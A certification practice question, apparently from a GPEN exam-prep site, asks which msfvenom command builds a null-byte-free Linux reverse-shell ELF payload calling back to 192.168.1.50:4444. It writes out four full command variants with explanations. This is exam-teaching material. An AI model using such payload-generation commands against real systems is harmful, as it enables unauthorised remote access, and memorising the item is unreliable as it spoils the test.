Courseiva
Metasploit →hardMultiple Choice

GPEN Metasploit Practice Question

A penetration tester uses msfvenom to generate a Linux ELF reverse shell payload. The tester wants the payload to connect back to 192.168.1.50 on port 4444 and to embed an encoder that removes null bytes and other bad characters to survive transmission through a constrained channel. Which msfvenom command line correctly produces this payload?

⚠ Common exam trap

The trap here is focusing on the encoder flag while overlooking that bad-character exclusion requires the -b option and that the output format must match the target platform.

Answer choices

Why each option matters

Answer the question above first, then reveal the full breakdown to understand why each option is right or wrong.

Correct answer & explanation

✓

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -f elf -o shell.elf

The correct msfvenom invocation selects the Linux reverse TCP payload, supplies the callback host and port, applies the shikata_ga_nai encoder, declares null bytes as bad characters with -b, and outputs an ELF file. The -b option is what drives the encoder to avoid those bytes in the final payload, which is required for the constrained channel. The other options either omit bad-character handling, use the wrong format, or add a contradictory platform flag.

Answer analysis

Option-by-option breakdown

For each option: why learners choose it and why it is or isn't the right answer here.

  • ✓

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -f elf -o shell.elf

    Why this is correct

    This command selects the Linux reverse TCP payload, sets the callback host and port, applies the shikata_ga_nai encoder, specifies null bytes as bad characters to avoid, and outputs an ELF file. The -b option tells msfvenom to encode the payload so the listed bytes do not appear, which is exactly the requirement for surviving a constrained channel. All parameters align with the scenario.

  • ✗

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -f elf -o shell.elf

    Why it's wrong here

    This command omits the -b option, so no bad characters are declared and the encoder is applied only for basic obfuscation without a specific exclusion list. Null bytes may still appear in the output, which could break transmission through the constrained channel. It does not meet the requirement to remove null bytes and other bad characters.

  • ✗

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -f elf -o shell.elf --platform windows

    Why it's wrong here

    This command includes an unnecessary and contradictory --platform windows option while targeting a Linux ELF payload. The platform flag would cause msfvenom to reject or misbuild the payload because the selected payload is for Linux. The rest of the command is correct, but the platform override invalidates it for the scenario.

  • ✗

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -f exe -o shell.elf

    Why it's wrong here

    The payload and encoder are correct, but the output format is set to exe, which produces a Windows executable rather than a Linux ELF binary. A Linux target cannot execute a PE file, so the payload would fail. The format must be elf to match the target platform, making this option incorrect despite the correct bad-character handling.

About these practice questions

This GPEN question is part of Courseiva's 298-question bank — original exam-style content with full explanations and wrong-answer analysis, never real exam questions or exam dumps. Learn why practice questions differ from exam dumps →

How Courseiva writes practice questions · Editorial policy

JA

Written and reviewed by Johnson Ajibi, MSc IT Security

Senior Network & Security Engineer · founder of Courseiva

Last reviewed September 2026 · checked against the official GIAC exam blueprint

This GPEN practice question is part of Courseiva's free GIAC certification practice question bank. Courseiva provides original exam-style practice questions with explanations, topic-based practice, mock exams, readiness tracking, and study analytics to help learners prepare for the GPEN exam.